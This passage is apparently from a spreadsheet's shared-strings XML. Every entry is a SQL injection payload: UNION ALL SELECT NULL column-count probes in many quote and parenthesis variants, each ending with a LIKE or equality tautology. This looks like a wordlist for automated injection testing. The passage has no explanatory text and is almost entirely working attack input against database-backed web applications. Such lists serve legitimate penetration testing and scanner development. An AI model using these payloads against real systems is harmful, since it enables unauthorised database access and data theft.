    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( 'Phbf' LIKE 'Phbf</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( 'zWha' LIKE 'zWha</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( 'LZhA' LIKE 'LZhA</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( 'lEEK' LIKE 'lEEK</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( 'AVvF' LIKE 'AVvF</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( 'lDxZ' LIKE 'lDxZ</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( 'wjLB' LIKE 'wjLB</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( 'hMZn' LIKE 'hMZn</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  'fueJ' LIKE 'fueJ</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  'rhzR' LIKE 'rhzR</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  'Ukxr' LIKE 'Ukxr</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  'hrhs' LIKE 'hrhs</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  'QCSi' LIKE 'QCSi</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  'fFbB' LIKE 'fFbB</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  'AcLq' LIKE 'AcLq</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  'acEm' LIKE 'acEm</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  'ljGy' LIKE 'ljGy</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  'HhiS' LIKE 'HhiS</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( 'scYM' LIKE 'scYM</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( 'VUoP' LIKE 'VUoP</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( 'wcUy' LIKE 'wcUy</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( 'QwTF' LIKE 'QwTF</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( 'PTMJ' LIKE 'PTMJ</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( 'KVZg' LIKE 'KVZg</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( 'KLnH' LIKE 'KLnH</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( 'KtvW' LIKE 'KtvW</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( 'bfHb' LIKE 'bfHb</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( 'dCFF' LIKE 'dCFF</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND 'CTTj' LIKE 'CTTj</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND 'wiCh' LIKE 'wiCh</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND 'fwVc' LIKE 'fwVc</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND 'RJFf' LIKE 'RJFf</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND 'Jzgn' LIKE 'Jzgn</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND 'MMeL' LIKE 'MMeL</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND 'Khli' LIKE 'Khli</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND 'jLXN' LIKE 'jLXN</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND 'Saps' LIKE 'Saps</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND 'rvig' LIKE 'rvig</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( "kwJm" = "kwJm</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( "XQgP" = "XQgP</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( "tcZa" = "tcZa</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( "RGbZ" = "RGbZ</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( "SLkw" = "SLkw</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( "cDzU" = "cDzU</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( "rxoC" = "rxoC</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( "liSI" = "liSI</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( "rsDu" = "rsDu</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( "Uztv" = "Uztv</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  "OsQH" = "OsQH</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  "bNbw" = "bNbw</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  "Ugcq" = "Ugcq</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  "IqFM" = "IqFM</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  "qTMX" = "qTMX</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  "yVEz" = "yVEz</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  "SlfO" = "SlfO</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  "MlSc" = "MlSc</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  "gpqO" = "gpqO</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  "wpsh" = "wpsh</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( "hKqB" = "hKqB</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( "FBFt" = "FBFt</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( "jQYZ" = "jQYZ</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( "pqrc" = "pqrc</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( "jPZQ" = "jPZQ</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( "RybC" = "RybC</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( "uwQh" = "uwQh</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( "GVJO" = "GVJO</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( "QrXp" = "QrXp</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( "rWWi" = "rWWi</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND "AmWC" = "AmWC</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND "cYId" = "cYId</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND "nAMr" = "nAMr</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND "xmLv" = "xmLv</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND "AOEv" = "AOEv</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND "OIZd" = "OIZd</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND "Bwfg" = "Bwfg</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND "aToh" = "aToh</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND "DoKS" = "DoKS</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND "YVAq" = "YVAq</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( "DuKV" LIKE "DuKV</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( "rYry" LIKE "rYry</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( "Nyix" LIKE "Nyix</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( "JqPM" LIKE "JqPM</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( "pdeB" LIKE "pdeB</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( "nlBE" LIKE "nlBE</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( "XmzU" LIKE "XmzU</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( "rGah" LIKE "rGah</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( "eVib" LIKE "eVib</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( "kGHJ" LIKE "kGHJ</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  "fZfe" LIKE "fZfe</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  "NTPa" LIKE "NTPa</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  "oJAR" LIKE "oJAR</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  "PXpM" LIKE "PXpM</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  "WQOy" LIKE "WQOy</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  "Stmx" LIKE "Stmx</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  "AKeW" LIKE "AKeW</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  "WEpz" LIKE "WEpz</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  "HKnR" LIKE "HKnR</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  "AqSl" LIKE "AqSl</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( "AXnW" LIKE "AXnW</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( "nBoP" LIKE "nBoP</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( "PMFz" LIKE "PMFz</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( "kMRj" LIKE "kMRj</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( "OrkC" LIKE "OrkC</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( "eovU" LIKE "eovU</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( "baQR" LIKE "baQR</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( "UpzJ" LIKE "UpzJ</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( "oqBO" LIKE "oqBO</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( "PdBK" LIKE "PdBK</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND "Tspi" LIKE "Tspi</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND "xBGE" LIKE "xBGE</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND "kUZe" LIKE "kUZe</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND "CSjv" LIKE "CSjv</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND "qfwA" LIKE "qfwA</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND "FInA" LIKE "FInA</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND "RhEn" LIKE "RhEn</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND "KJkT" LIKE "KJkT</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND "EFxu" LIKE "EFxu</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND "Wmwv" LIKE "Wmwv</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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xml:space="preserve"> )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( 128 = 128</t>
  </si>
  <si>
    <t xml:space="preserve"> )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( 2983 = 2983</t>
  </si>
  <si>
    <t xml:space="preserve"> )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( 9183 = 9183</t>
  </si>
  <si>
    <t xml:space="preserve"> )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( 4078 = 4078</t>
  </si>
  <si>
    <t xml:space="preserve"> )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( 8204 = 8204</t>
  </si>
  <si>
    <t xml:space="preserve"> )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( 953 = 953</t>
  </si>
  <si>
    <t xml:space="preserve"> )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( 3939 = 3939</t>
  </si>
  <si>
    <t xml:space="preserve"> )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( 7184 = 7184</t>
  </si>
  <si>
    <t xml:space="preserve"> )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( 182 = 182</t>
  </si>
  <si>
    <t xml:space="preserve"> )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( 2895 = 2895</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  5443 = 5443</t>
  </si>
  <si>
